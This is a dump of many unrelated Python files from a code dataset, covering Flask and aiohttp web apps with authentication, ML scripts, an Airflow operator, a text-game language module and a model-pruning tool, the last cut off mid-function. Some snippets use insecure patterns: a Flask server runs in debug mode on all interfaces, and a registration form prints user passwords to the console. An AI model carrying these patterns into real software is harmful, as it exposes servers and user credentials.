filePath = 'data/{0}/{1}.csv'.format(seasonPath, countryPath)
if os.path.exists(filePath):
inputFile = open(filePath, 'r')
header = None
for index, line in enumerate(inputFile):
if index == 0:
header = line.rstrip().split(',')
else:
tokens = line.rstrip().split(',')
fixture = Fixture(header, tokens)
fixtureList.append(fixture)
return fixtureList
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5050, debug=True)
| StarcoderdataPython |
4949164 | # Author: <NAME>
# Last modified: 5/12/2018
# CONFIG FOR SYSTEM DEVICES
# ARDUINO
arduino_serial_port = "/dev/ttyACM0"
arduino_baud = 9600
arduino_timeout = 0
# RPI CAMERA
camera_resolution = (720, 480)
| StarcoderdataPython |
1928057 | # from test import create_app
from app import create_app
app = create_app()
| StarcoderdataPython |
3462242 | from keras.models import model_from_json
import numpy as np
from PIL import Image, ImageFilter
import PIL.ImageOps
from collections import Counter
import argparse as ap
# fix random seed for reproducibility
seed = 7
np.random.seed(seed)
# Get the path of the training set
parser = ap.ArgumentParser()
parser.add_argument("-i", "--image", help="Path to Image", required="True")
args = vars(parser.parse_args())
# load JSON and create model
json_file = open('model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
loaded_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# function to convert image to MNIST format
def imageprepare(argv):
img = Image.open(argv).convert('L')
width = float(img.size[0])
height = float(img.size[1])
new_image = Image.new('L', (28, 28), (255)) # creates white canvas of 28x28 pixels
if width > height:
# Width is bigger. Width becomes 20 pixels.
nheight = int(round((20.0 / width * height), 0))
if (nheight == 0): # rare case but minimum is 1 pixel
nheight = 1
# resize and sharpen
img = img.resize((20, nheight), Image.ANTIALIAS).filter(ImageFilter.SHARPEN)
wtop = int(round(((28 - nheight) / 2), 0)) # calculate horizontal position
new_image.paste(img, (4, wtop)) # paste resized image on white canvas
else:
# Height is bigger. Heigth becomes 20 pixels.
nwidth = int(round((20.0 / height * width), 0))
if (nwidth == 0): # rare case but minimum is 1 pixel
nwidth = 1
# resize and sharpen
img = img.resize((nwidth, 20), Image.ANTIALIAS).filter(ImageFilter.SHARPEN)
wleft = int(round(((28 - nwidth) / 2), 0)) # caculate vertical pozition
new_image.paste(img, (wleft, 4)) # paste resized image on white canvas
new_image = PIL.ImageOps.invert(new_image)
tv = list(new_image.getdata()) # get pixel values
pixels = np.array(tv).reshape(1,784)
return pixels
# load weights into new model
loaded_model.load_weights('model.h5')
print('Loaded model from disk')
# convert image to MNIST format
test = imageprepare(args['image'])
# normalize data from 0-255 to 0-1
test = test/255
# make and print prediction
prediction = loaded_model.predict_classes(test)
prediction = Counter(prediction).most_common(1)[0][0]
print ("Prediction is: ", prediction)
| StarcoderdataPython |
1773574 | <reponame>jpodivin/pystrand
import multiprocessing as mp
import uuid
from pystrand.populations import BasePopulation
from pystrand.selections import RouletteSelection, ElitismSelection, BaseSelection
from pystrand.mutations import BaseMutation, PointMutation
from pystrand.loggers.csv_logger import CsvLogger
from pystrand.loggers.details import RunDetails
class BaseOptimizer:
"""Base optimizer class.
Parameters
----------
fitness_function : BaseFunction
provides mapping from genotype to a fitness value, [0, 1]
max_iterations : int
0 by default
population : Population
Seed population, can include known sub-optimal solutions.
mutation_prob : float
0.001 by default
mutation_ops :
Mutation operator to use on genotypes.
Uses supplied mutation_prob. If None, defaults to PointMutation.
None by default.
crossover_prob : float
0.0 by default, no crossover will take place
selection_ops :
selected_fraction :
log_path :
parallelize : bool
Use multiprocessing to evaluate genomes in parallel?
Raises
------
TypeError
If supplied wrong selection method type.
If supplied mutation_op not subclassing BaseMutation.
"""
def __init__(self,
population,
max_iterations=0,
fitness_function=None,
mutation_prob=0.001,
mutation_ops=None,
crossover_prob=0.0,
selection_ops='roulette',
selected_fraction=0.1,
log_path=None,
parallelize=False,
**kwargs):
"""For each element in list of selection methods we check the type.
Only Selection and string are accepted, other types raise TypeError.
The strings must be reckognized as names of algorithm,
any other string will result in ValueError.
"""
self._optimizer_uuid = str(uuid.uuid1())
self._fitness_function = fitness_function
if mutation_ops:
if isinstance(mutation_ops, list):
self._mutation_ops = mutation_ops
elif issubclass(type(mutation_ops), BaseMutation):
self._mutation_ops = [mutation_ops]
else:
raise TypeError(
'Invalid mutation operator.',
type(mutation_ops))
else:
self._mutation_ops = [PointMutation(mutation_prob)]
if log_path:
self.logger = CsvLogger(log_path=log_path)
if kwargs.get('save_details'):
self.details_logger = RunDetails(log_path=log_path)
else:
self.details_logger = None
else:
self.logger = None
self.details_logger = None
self._crossover_probability = crossover_prob
self._selection_methods = []
self._parallelize = parallelize
self._population = population
self._max_iterations = max_iterations
#First we turn selection_methods into list, in case it isn't.
if not isinstance(selection_ops, list):
selection_ops = [selection_ops]
for selection_method in selection_ops:
if isinstance(selection_method, str):
if selection_method == 'roulette':
self._selection_methods += [RouletteSelection(selected_fraction)]
elif selection_method == 'elitism':
self._selection_methods += [ElitismSelection(selected_fraction)]
else:
raise ValueError(
'Unknown selection algorithm name.',
selection_method)
elif isinstance(selection_method, BaseSelection):
self._selection_methods += [selection_method]
else:
raise TypeError(
'Invalid selection type.',
type(selection_method))
def evaluate_individual(self, individual):
"""Return fitness value of the given individual.
"""
return self._fitness_function(individual)
def evaluate_population(self):
"""Apply set fitness function to every individual in _population
in either sequential or parallel manner depending on value of
the _paralelize attribute. And store result in the 'fitness' field.
"""
evaluated_individuals = self._population.individuals
if self._parallelize:
with mp.Pool() as worker_pool:
result = worker_pool.map_async(
self._fitness_function,
evaluated_individuals['genotype']).get(5)
evaluated_individuals['fitness'] = result
else:
evaluated_individuals['fitness'] = [
self._fitness_function(individual)
for individual
in evaluated_individuals['genotype']]
self._population.replace_individuals(evaluated_individuals)
def select_genomes(self):
"""Create new population by sequentially applying selection operators
in the order they were given to __init__.
Expand the new population to match the original one.
"""
new_population = BasePopulation(
0,
self._population.genome_shapes,
self._population.gene_values)
for selection_method in self._selection_methods:
new_population.append_individuals(
selection_method.select(self._population))
new_population.expand_population(
self._population.population_size)
self._population = new_population
def fit(self, fitnes_function=None, verbose=1):
"""Main training loop.
Return statistics of the run as dictionary of lists.
Parameters
----------
fitness_function: BaseFunction
verbose : int
If not '0' outputs statistics using print every generation.
Default is 1.
"""
if fitnes_function:
self._fitness_function = fitnes_function
elif not self._fitness_function:
raise RuntimeError("No fitness function supplied")
run_id = uuid.uuid1()
history = {
"iteration" : [],
"max_fitness" : [],
"min_fitness" : [],
"fitness_avg" : [],
"fitness_std" : []}
iteration = 0
while iteration < self._max_iterations:
try:
self.evaluate_population()
except mp.TimeoutError as timeoutException:
print(
"Population evaluation timed out, with exception {}.".format(
timeoutException))
break
history["iteration"].append(iteration)
history["max_fitness"].append(self._population.max_fitness)
history["min_fitness"].append(self._population.min_fitness)
history["fitness_avg"].append(self._population.avg_fitness)
history["fitness_std"].append(self._population.fitness_std)
if verbose > 0:
print(" // ".join(
[key + ": " + str(record[-1]) for key, record in history.items()]
))
if self._population.max_fitness == 1.0:
break
self.select_genomes()
self._population.mutate_genotypes(mutation_ops=self._mutation_ops)
if self._crossover_probability > 0.0:
self._population.cross_genomes(
crossover_prob=self._crossover_probability)
iteration += 1
if self.logger:
self.logger.save_history(history, run_id=run_id)
if self.details_logger:
self.details_logger.save_run_details(self)
return history
@property
def population(self):
"""Return optimized population.
"""
return self._population
@property
def optimizer_uuid(self):
"""Return uuid of the optimizer.
"""
return self._optimizer_uuid
| StarcoderdataPython |
12844977 | <reponame>lucaspfigueiredo/elt-pipeline<filename>plugins/operators/vivareal_operator.py
import json
import logging
from hooks.vivareal_hook import VivarealHook
from airflow.utils.decorators import apply_defaults
from airflow.models.baseoperator import BaseOperator
from airflow.providers.amazon.aws.hooks.s3 import S3Hook
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class VivarealOperator(BaseOperator):
template_fields = [
"s3_key",
"s3_bucket_name"
]
@apply_defaults
def __init__(self, s3_key, s3_bucket_name, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.s3_key = s3_key
self.s3_bucket_name = s3_bucket_name
def execute(self, context):
hook = VivarealHook()
s3_hook = S3Hook(aws_conn_id="s3_connection")
logger.info(f"Getting data")
with open("vivareal.json", "w") as fp:
for blocks in hook.run():
for ap in blocks:
json.dump(ap, fp, ensure_ascii=False)
fp.write(",\n")
logger.info(f"Uploading object in S3 {self.s3_bucket_name}")
s3_hook.load_file(
filename=fp.name,
key=self.s3_key,
bucket_name=self.s3_bucket_name
)
if __name__ == "__main__":
operator = VivarealOperator(file_path="/some/directory")
operator.execute() | StarcoderdataPython |
11253281 | <gh_stars>100-1000
# coding=utf-8
from migrate.versioning import api
from app.config import SQLALCHEMY_DATABASE_URI
from app.config import SQLALCHEMY_MIGRATE_REPO
from app import db
import os.path
if __name__ == '__main__':
db.create_all()
if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):
api.create(SQLALCHEMY_MIGRATE_REPO, 'database repository')
api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
else:
api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, api.version(SQLALCHEMY_MIGRATE_REPO))
| StarcoderdataPython |
3510010 | """
This tool returns the R length subsequences of elements from the input iterable.
Combinations are emitted in lexicographic sorted order. So, if the input iterable is sorted, the combination tuples will be produced in sorted order.
"""
from itertools import combinations
Sk = input().split()
S = Sk[0]
k = int(Sk[1])
B = ''.join(sorted(S))
for x in range(1, k+1):
for y in list(combinations(B, x)):
print(''.join(y))
| StarcoderdataPython |
6658544 | <reponame>twisted/imaginary
# -*- test-case-name: imaginary.test.test_language -*-
"""
Textual formatting for game objects.
"""
import types
from string import Formatter
import attr
from zope.interface import implements, implementer
from twisted.python.components import registerAdapter
from imaginary import iimaginary, iterutils, text as T
from imaginary.iimaginary import IConcept, IExit
class Gender(object):
"""
enum!
"""
MALE = 1
FEMALE = 2
NEUTER = 3
INDETERMINATE = 4
class Noun(object):
"""
This is a language wrapper around a Thing.
It is separated into its own class for two reasons:
- You should try to keep your game-logic self-contained and avoid
polluting it with lots of constant strings, so that porting to new
interfaces (text prototype -> isometric final implementation) is easy.
It's easier to read the code that way and make changes to the logic even
if you don't want to move to a different interface.
- It would be nice if text games could be internationalized by separating
the formatting logic from the game logic. In an extreme case, it would
be SUPER-COOL if people could be playing the same game in french and
english on the same server, simply by changing a setting on their
client.
"""
def __init__(self, thing):
self.thing = thing
def shortName(self):
return ExpressString(self.thing.name)
def nounPhrase(self):
if self.thing.proper:
return self.shortName()
return ExpressList([self.indefiniteArticle(), self.shortName()])
def definiteNounPhrase(self):
if self.thing.proper:
return self.shortName()
return ExpressList([self.definiteArticle(), self.shortName()])
def indefiniteArticle(self):
# XXX TODO FIXME: YTTRIUM
if self.thing.name[0].lower() in u'aeiou':
return u'an '
return u'a '
def definiteArticle(self):
return u'the '
def _declension(self, male, female, indeterminate, neuter):
"""
Produce a declension based on the grammatical gender of the wrapped
L{Thing}.
@param male: the male declension of the specified pronoun
@type male: L{unicode}
@param female: the female declension of the specified pronoun
@type female: L{unicode}
@param indeterminate: the indeterminate declension of the specified
pronoun
@type indeterminate: L{unicode}
@param neuter: the neuter declension of the specified pronoun
@type neuter: L{unicode}
@return: one of the parameters
@rtype: L{unicode}
"""
return ExpressString({
Gender.MALE: male,
Gender.FEMALE: female,
Gender.INDETERMINATE: indeterminate,
}.get(self.thing.gender, neuter))
def heShe(self):
"""
Return the personal pronoun for the wrapped thing.
"""
return self._declension(u'he', u'she', u'they', u'it')
def himHer(self):
"""
Return the objective pronoun for the wrapped thing.
"""
return self._declension(u'him', u'her', u'them', u'it')
def hisHer(self):
"""
Return a possessive determiner for the wrapped thing.
"""
return self._declension(u'his', u'her', u'their', u'its')
def hisHers(self):
"""
Return a substantival possessive pronoun for the wrapped thing.
"""
return self._declension(u'his', u'hers', u'theirs', u'its')
def flattenWithoutColors(vt102):
return T.flatten(vt102, useColors=False)
@implementer(iimaginary.IConcept)
class BaseExpress(object):
def __init__(self, original):
self.original = original
def plaintext(self, observer):
return flattenWithoutColors(self.vt102(observer))
@implementer(IConcept)
@attr.s
class Description(object):
title = attr.ib()
exits = attr.ib()
description = attr.ib()
components = attr.ib()
target = attr.ib(default=None)
def plaintext(self, observer):
return flattenWithoutColors(self.vt102(observer))
def vt102(self, observer):
title = [T.bold, T.fg.green, u'[ ',
[T.fg.normal, IConcept(self.title).vt102(observer)],
u' ]\n']
yield title
exits = list(
IConcept(exit.name).vt102(observer)
for exit in (self.exits or ())
if exit.shouldEvenAttemptTraversalFrom(self.target,
observer))
if exits:
yield [
T.bold, T.fg.green, u'( ', [
T.fg.normal, T.fg.yellow,
iterutils.interlace(
u' ', exits)],
u' )', u'\n']
if self.description:
yield (T.fg.green, self.description, u'\n')
if self.components:
yield iterutils.interlace(
u"\n",
filter(None,
(component.vt102(observer)
for component in self.components)))
@classmethod
def fromVisualization(cls, target, others):
"""
Create a L{Description} from a L{Thing} and some L{Paths} visually
related to that L{Thing}.
@param target: The L{IThing} being described by this L{Description}.
@type target: L{IThing}
@param others: Paths to items that are visible as portions of the
target.
@type others: L{list} of L{Path <imaginary.idea.Path>}s.
@return: A L{Description} comprising C{target} and C{others}.
"""
exits = []
for other in others:
# All of others are paths that go through target so just
# using targetAs won't accidentally include any exits that aren't
# for the target room except for the bug mentioned below.
#
# TODO: This might show too many exits. There might be exits to
# rooms with exits to other rooms, they'll all show up as on some
# path here as IExit targets. Check the exit's source to make sure
# it is target.
anExit = other.targetAs(IExit)
if anExit is not None:
exits.append(anExit)
exits.sort(key=lambda anExit: anExit.name)
descriptionConcepts = []
for pup in target.powerupsFor(iimaginary.IDescriptionContributor):
descriptionConcepts.append(pup.contributeDescriptionFrom(others))
def index(c):
# https://github.com/twisted/imaginary/issues/63
preferredOrder = [
'ExpressCondition',
'ExpressClothing',
]
try:
return preferredOrder.index(c.__class__.__name__)
except ValueError:
# Anything unrecognized goes after anything recognized.
return len(preferredOrder)
descriptionConcepts.sort(key=index)
return cls(
title=Noun(target).shortName(),
exits=exits,
description=target.description,
components=descriptionConcepts,
target=target,
)
class ExpressNumber(BaseExpress):
implements(iimaginary.IConcept)
def vt102(self, observer):
return str(self.original)
class ExpressString(BaseExpress):
implements(iimaginary.IConcept)
def __init__(self, original, capitalized=False):
self.original = original
self._cap = capitalized
def vt102(self, observer):
if self._cap:
return self.original[:1].upper() + self.original[1:]
return self.original
def capitalizeConcept(self):
return ExpressString(self.original, True)
class ExpressList(BaseExpress):
implements(iimaginary.IConcept)
def concepts(self, observer):
return map(iimaginary.IConcept, self.original)
def vt102(self, observer):
return [x.vt102(observer) for x in self.concepts(observer)]
def capitalizeConcept(self):
return Sentence(self.original)
class Sentence(ExpressList):
def vt102(self, observer):
o = self.concepts(observer)
if o:
o[0] = o[0].capitalizeConcept()
return [x.vt102(observer) for x in o]
def capitalizeConcept(self):
return self
registerAdapter(ExpressNumber, int, iimaginary.IConcept)
registerAdapter(ExpressNumber, long, iimaginary.IConcept)
registerAdapter(ExpressString, str, iimaginary.IConcept)
registerAdapter(ExpressString, unicode, iimaginary.IConcept)
registerAdapter(ExpressList, list, iimaginary.IConcept)
registerAdapter(ExpressList, tuple, iimaginary.IConcept)
registerAdapter(ExpressList, types.GeneratorType, iimaginary.IConcept)
class ItemizedList(BaseExpress):
implements(iimaginary.IConcept)
def __init__(self, listOfConcepts):
self.listOfConcepts = list(listOfConcepts)
def concepts(self, observer):
return self.listOfConcepts
def vt102(self, observer):
return ExpressList(
itemizedStringList(self.concepts(observer))).vt102(observer)
def capitalizeConcept(self):
listOfConcepts = self.listOfConcepts[:]
if listOfConcepts:
listOfConcepts[0] = iimaginary.IConcept(listOfConcepts[0]).capitalizeConcept()
return ItemizedList(listOfConcepts)
def itemizedStringList(desc):
if len(desc) == 1:
yield desc[0]
elif len(desc) == 2:
yield desc[0]
yield u' and '
yield desc[1]
elif len(desc) > 2:
for ele in desc[:-1]:
yield ele
yield u', '
yield u'and '
yield desc[-1]
class ConceptTemplate(object):
"""
A L{ConceptTemplate} wraps a text template which may intersperse literal
strings with markers for substitution.
Substitution markers follow U{the syntax for str.format<http://docs.python.org/2/library/string.html#format-string-syntax>}.
Values for field names are supplied to the L{expand} method.
"""
def __init__(self, templateText):
"""
@param templateText: The text of the template. For example,
C{u"Hello, {target:name}."}.
@type templateText: L{unicode}
"""
self.templateText = templateText
def expand(self, values):
"""
Generate concepts based on the template.
@param values: A L{dict} mapping substitution markers to application
objects from which to take values for those substitutions. For
example, a key might be C{u"target"}. The associated value will be
sustituted each place C{u"{target}"} appears in the template
string. Or, the value's name will be substituted each place
C{u"{target:name}"} appears in the template string.
@type values: L{dict} mapping L{unicode} to L{object}
@return: An iterator the combined elements of which represent the
result of expansion of the template. The elements are adaptable to
L{IConcept}.
"""
parts = Formatter().parse(self.templateText)
for (literalText, fieldName, formatSpec, conversion) in parts:
if literalText:
yield ExpressString(literalText)
if fieldName:
try:
target = values[fieldName.lower()]
except KeyError:
extra = u""
if formatSpec:
extra = u" '%s'" % (formatSpec,)
yield u"<missing target '%s' for%s expansion>" % (
fieldName, extra)
else:
if formatSpec:
# A nice enhancement would be to delegate this logic to
# target
try:
expander = getattr(
self, '_expand_' + formatSpec.upper()
)
except AttributeError:
yield u"<'%s' unsupported by target '%s'>" % (
formatSpec, fieldName)
else:
yield expander(target)
else:
yield target
def _expand_NAME(self, target):
"""
Get the name of a L{Thing}.
"""
return target.name
def _expand_PRONOUN(self, target):
"""
Get the personal pronoun of a L{Thing}.
"""
return Noun(target).heShe()
| StarcoderdataPython |
4919790 | """This module provides auth views."""
import uuid
from http import HTTPStatus
from aiohttp import web
from aiojobs.aiohttp import spawn
from aiohttp_jinja2 import render_template
from app.cache import (
cache,
RESET_PASSWORD_CACHE_KEY,
RESET_PASSWORD_CACHE_EXPIRE,
CHANGE_EMAIL_CACHE_KEY,
CHANGE_EMAIL_CACHE_EXPIRE
)
from app.models.user import User
from app.utils.response import make_response
from app.utils.errors import DatabaseError
from app.utils.validators import validate_email, validate_password
from app.utils.jwt import generate_token, decode_token
from app.utils.errors import TokenError
from app.utils.mail import send_reset_password_mail, send_change_email_mail, send_user_signup_mail
auth_routes = web.RouteTableDef()
@auth_routes.view("/v1/auth/signup")
class AuthSignUp(web.View):
"""Class that includes functionality to sign up user in system."""
async def post(self):
"""Create a new user in system."""
body = self.request.body
try:
email, password = body["email"], body["password"]
except KeyError:
return make_response(
success=False,
message="Required fields email or password is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
validation_errors = validate_password(password) + validate_email(email)
if validation_errors:
return make_response(
success=False,
message=' '.join(validation_errors),
http_status=HTTPStatus.BAD_REQUEST
)
password_hash = User.generate_password_hash(password)
try:
user = await User.create(email=email, password=password_hash)
except DatabaseError as err:
return make_response(
success=False,
message=str(err),
http_status=HTTPStatus.BAD_REQUEST
)
await spawn(self.request, send_user_signup_mail(user.email))
response_data = {"id": user.id, "email": user.email}
return make_response(
success=True,
message="The user was successfully created.",
data=response_data,
http_status=HTTPStatus.CREATED,
)
@auth_routes.view("/v1/auth/signin")
class AuthSignIn(web.View):
"""Class that includes functionality to sign in user in system."""
async def post(self):
"""Login a user if the supplied credentials are correct."""
body = self.request.body
config = self.request.app.config
try:
email, password = body["email"], body["password"]
except KeyError:
return make_response(
success=False,
message="Required fields email or password is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
try:
user = await User.get_by_email(email)
except DatabaseError as err:
return make_response(
success=False,
message=str(err),
http_status=HTTPStatus.UNAUTHORIZED
)
is_correct = user.check_password_hash(password)
if not is_correct:
return make_response(
success=False,
message="The provided password for such user is not correct.",
http_status=HTTPStatus.UNAUTHORIZED
)
token, token_exp = generate_token(
secret_key=config.JWT_SECRET_KEY,
private_claims={"user_id": user.id},
exp_days=config.ACCESS_JWT_EXP_DAYS
)
refresh_token, refresh_token_exp = generate_token(
secret_key=config.JWT_SECRET_KEY,
private_claims={"user_id": user.id},
exp_days=config.REFRESH_JWT_EXP_DAYS
)
response_data = {
"access_token": token, "access_token_exp": token_exp,
"refresh_access_token": refresh_token, "refresh_access_token_exp": refresh_token_exp
}
return make_response(
success=True,
message="The user was successfully authorized.",
data=response_data,
http_status=HTTPStatus.OK,
)
@auth_routes.view("/v1/auth/refresh_access")
class AuthRefreshAccess(web.View):
"""Class that includes functionality to refresh access token for user."""
async def post(self):
"""Return refreshed access token for a user."""
body = self.request.body
config = self.request.app.config
try:
refresh_token = body["refresh_access_token"]
except KeyError:
return make_response(
success=False,
message="Required field refresh_access_token is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
try:
payload = decode_token(refresh_token, config.JWT_SECRET_KEY)
except TokenError as err:
return make_response(
success=False,
message=f"Invalid refresh access token. {str(err)}",
http_status=HTTPStatus.BAD_REQUEST
)
user_id = payload["user_id"]
token, token_exp = generate_token(
secret_key=config.JWT_SECRET_KEY,
private_claims={"user_id": user_id},
exp_days=config.ACCESS_JWT_EXP_DAYS
)
refresh_token, refresh_token_exp = generate_token(
secret_key=config.JWT_SECRET_KEY,
private_claims={"user_id": user_id},
exp_days=config.REFRESH_JWT_EXP_DAYS
)
response_data = {
"access_token": token, "access_token_exp": token_exp,
"refresh_access_token": refresh_token, "refresh_access_token_exp": refresh_token_exp
}
return make_response(
success=True,
message="The access token was successfully refreshed.",
data=response_data,
http_status=HTTPStatus.OK,
)
@auth_routes.view("/v1/auth/change_password")
class AuthChangePasswordView(web.View):
"""Class that includes functionality to work with user password in system."""
async def put(self):
"""Change password for user in case provided old password is correct."""
body = self.request.body
try:
old_password, new_password = body["old_password"], body["new_password"]
except KeyError:
return make_response(
success=False,
message="Required fields old_password or new_password is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
try:
user = await User.get_by_id(self.request.user_id)
except DatabaseError as err:
return make_response(
success=False,
message=str(err),
http_status=HTTPStatus.BAD_REQUEST
)
is_correct = user.check_password_hash(old_password)
if not is_correct:
return make_response(
success=False,
message="The provided old password is not correct.",
http_status=HTTPStatus.BAD_REQUEST
)
validation_errors = validate_password(new_password)
if validation_errors:
return make_response(
success=False,
message=f"Invalid new password: {' '.join(validation_errors)}",
http_status=HTTPStatus.BAD_REQUEST
)
password_hash = User.generate_password_hash(new_password)
try:
await User.update(self.request.user_id, password=password_hash)
except DatabaseError:
return make_response(
success=False,
message="The user password was not changed.",
http_status=HTTPStatus.BAD_REQUEST
)
return make_response(
success=True,
message="The user password was successfully changed.",
http_status=HTTPStatus.OK,
)
@auth_routes.view("/v1/auth/reset_password")
class AuthResetPasswordView(web.View):
"""Class that includes functionality for user password resetting."""
async def get(self):
"""Render reset password form."""
try:
reset_password_code = self.request.query["reset_password_code"]
except KeyError:
return make_response(
success=False,
message="Required param reset_password_code is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
return render_template(
"reset_password.html",
self.request,
{"reset_password_code": reset_password_code}
)
async def post(self):
"""Kick off user password resetting."""
body = self.request.body
try:
email = body["email"]
except KeyError:
return make_response(
success=False,
message="Required field email is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
try:
user = await User.get_by_email(email)
except DatabaseError as err:
return make_response(
success=False,
message=str(err),
http_status=HTTPStatus.BAD_REQUEST
)
reset_password_code = str(uuid.uuid4())
reset_password_key = RESET_PASSWORD_CACHE_KEY.format(code=reset_password_code)
await cache.set(reset_password_key, user.id, RESET_PASSWORD_CACHE_EXPIRE)
reset_password_url = self.request.url.update_query({"reset_password_code": reset_password_code})
await spawn(self.request, send_reset_password_mail(user, str(reset_password_url)))
return make_response(
success=True,
message=f"The email with link for password resetting should soon be delivered to {user.email}.",
http_status=HTTPStatus.OK,
)
async def put(self):
"""Create a new password for user."""
body = self.request.body
try:
new_password = body["<PASSWORD>"]
reset_password_code = body["reset_password_code"]
except KeyError:
return make_response(
success=False,
message="Required field new_password or reset_password_code is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
reset_password_key = RESET_PASSWORD_CACHE_KEY.format(code=reset_password_code)
user_id = await cache.get(reset_password_key)
if user_id is None:
return make_response(
success=False,
message="Required field reset_password_code is not correct or expired.",
http_status=HTTPStatus.BAD_REQUEST
)
validation_errors = validate_password(new_password)
if validation_errors:
return make_response(
success=False,
message=f"Invalid new password: {' '.join(validation_errors)}",
http_status=HTTPStatus.BAD_REQUEST
)
password_hash = User.generate_password_hash(new_password)
try:
await User.update(int(user_id), password=password_<PASSWORD>)
except DatabaseError:
return make_response(
success=False,
message="The user password was not changed.",
http_status=HTTPStatus.BAD_REQUEST
)
await spawn(self.request, cache.delete(reset_password_key))
return make_response(
success=True,
message="The user password was successfully changed.",
http_status=HTTPStatus.OK,
)
@auth_routes.view("/v1/auth/change_email")
class AuthChangeEmailView(web.View):
"""Class that includes functionality to change user email."""
async def post(self):
"""Send email changing confirmation to old user email."""
body = self.request.body
user_id = self.request.user_id
try:
new_email = body["new_email"]
except KeyError:
return make_response(
success=False,
message="Required field new_email is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
validation_errors = validate_email(new_email)
if validation_errors:
return make_response(
success=False,
message=' '.join(validation_errors),
http_status=HTTPStatus.BAD_REQUEST
)
try:
user = await User.get_by_id(user_id)
except DatabaseError as err:
return make_response(
success=False,
message=str(err),
http_status=HTTPStatus.BAD_REQUEST
)
if user.email == new_email:
return make_response(
success=False,
message="New email cannot be the same as your old email",
http_status=HTTPStatus.BAD_REQUEST
)
change_email_code = str(uuid.uuid4())
change_email_key = CHANGE_EMAIL_CACHE_KEY.format(code=change_email_code)
change_email_cache_data = {"user_id": user_id, "new_email": new_email}
await cache.set(change_email_key, change_email_cache_data, CHANGE_EMAIL_CACHE_EXPIRE)
change_email_url = f"{self.request.url}/confirm?change_email_code={change_email_code}"
await spawn(self.request, send_change_email_mail(user, new_email, str(change_email_url)))
return make_response(
success=True,
message=f"The email with link for email changing confirmation "
f"should soon be delivered to {user.email}.",
http_status=HTTPStatus.OK,
)
@auth_routes.view("/v1/auth/change_email/confirm")
class AuthChangeEmailConfirmView(web.View):
"""Class that includes functionality to confirm user email changing."""
async def get(self):
"""Return confirm response of user email changing."""
# TODO: return errors as html too
try:
change_email_code = self.request.query["change_email_code"]
except KeyError:
return make_response(
success=False,
message="Required param change_email_code is not provided.",
http_status=HTTPStatus.UNPROCESSABLE_ENTITY
)
change_email_key = CHANGE_EMAIL_CACHE_KEY.format(code=change_email_code)
change_email_cache_data = await cache.get(change_email_key)
if not change_email_cache_data:
return make_response(
success=False,
message="Required query argument change_email_code is not correct or was expired.",
http_status=HTTPStatus.BAD_REQUEST
)
user_id, new_email = change_email_cache_data["user_id"], change_email_cache_data["new_email"]
try:
await User.update(user_id, email=new_email)
except DatabaseError:
return make_response(
success=False,
message="The user email was not updated.",
http_status=HTTPStatus.BAD_REQUEST
)
return render_template(
"change_email_confirm.html",
self.request,
{"new_email": new_email}
)
| StarcoderdataPython |
1903492 | from django.contrib import admin
from .models import Balance, User
# Register your models here.
admin.site.register(User)
admin.site.register(Balance)
| StarcoderdataPython |
6687266 | <reponame>justnclrk/Python
from flask import Flask, render_template, redirect, request, session, flash
import re
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
app = Flask(__name__)
app.secret_key = 'KeepItSecretKeepItSafe'
@app.route('/')
def reg():
return render_template('index.html')
@app.route('/form', methods=['POST'])
def form():
error = False
if len(request.form['first_name']) < 1:
flash("First Name Error!")
error = True
if len(request.form['last_name']) < 1:
flash("Last Name Error!")
error = True
if len(request.form['email']) < 1:
flash("Enter Email!")
error = True
elif not EMAIL_REGEX.match(request.form['email']):
flash("Enter Valid Email!")
error = True
if len(request.form['password']) < 8:
flash("Password too short")
error = True
if not len(request.form['password']) == len(request.form['confirm']):
flash("Passwords not the same!")
error = True
if error == True:
return render_template('index.html')
else:
print request.form['first_name']
print request.form['last_name']
print request.form['email']
print request.form['password']
flash("Thank you for your submission, see you in the matrix!")
return render_template('index.html')
app.run(debug=True)
| StarcoderdataPython |
1956302 | # -*- coding: utf-8 -*-
import torch
import torch.onnx
import torch.onnx.symbolic_helper
import torch.onnx.utils
import torch.nn as nn
import numpy as np
from collections import OrderedDict
from . import register
from . import mask_utils
from . import function_module
from typing import Dict, List
from torchpruner.operator import operator
from torchpruner.model_tools import *
import time
import copy
def create_operator(node):
op_kind = node.kind().split("::")
type_name = op_kind[1]
operator_class = register.operator_reg.get(type_name)
if operator_class is None:
raise RuntimeError("Can not find operator " + str(type_name))
return operator_class(node)
max_search_time = 100000
def _operator_params_combine(params_list):
params_dict = {}
for params in params_list:
for key in params:
if not isinstance(params[key], int):
raise RuntimeError("The change params must be integer")
if key not in params_dict:
params_dict[key] = params[key]
else:
params_dict[key] += params[key]
return params_dict
def _get_all_modules(module_dict, prefix, names):
module_list = []
for name in names:
prefix = prefix + "." + name
module_list.append(module_dict[prefix])
return module_list
def _get_common(scope1, scope2):
prefix = ""
i = 0
while i < len(scope1) and i < len(scope2):
if scope1[i] == scope2[i]:
if prefix == "":
prefix += scope1[i]
else:
prefix = prefix + "." + scope1[i]
i += 1
else:
break
list1 = []
list2 = []
for j in range(i, len(scope1)):
list1.append(scope1[j])
for j in range(i, len(scope2)):
list2.append(scope2[j])
return prefix, list1, list2
def _cat_names(names):
name = names[0]
for i in range(1, len(names)):
name = name + "." + names[i]
return name
def _find_module_list(module_list, target):
keys = None
if isinstance(module_list, nn.ModuleList):
keys = range(0, len(module_list))
if isinstance(module_list, nn.ModuleDict):
